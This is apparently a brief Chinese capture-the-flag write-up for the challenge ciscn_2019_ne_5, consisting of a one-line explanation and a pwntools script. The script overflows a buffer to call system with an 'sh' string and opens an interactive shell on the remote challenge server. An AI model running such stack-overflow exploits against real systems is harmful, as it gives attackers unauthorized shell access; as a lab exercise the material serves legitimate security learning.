ret2text类型

从fflush中获取 “sh”   传参给system即可

 

 脚本如下

from pwn import *

r=remote('node3.buuoj.cn',25488)
e=ELF('ciscn_2019_ne_5')
sys_plt=e.plt['system']
sh_addr=0x80482ea

r.recvuntil('Please input admin password:')
r.sendline('administrator')

r.recvuntil('0.Exit\n:')
r.sendline('1')

payload='a'*0x4c+p32(sys_plt)+'aaaa'+p32(sh_addr)
r.recvuntil('Please input new log info:')
r.sendline(payload)

r.recvuntil('0.Exit\n:')
r.sendline('4')

r.interactive()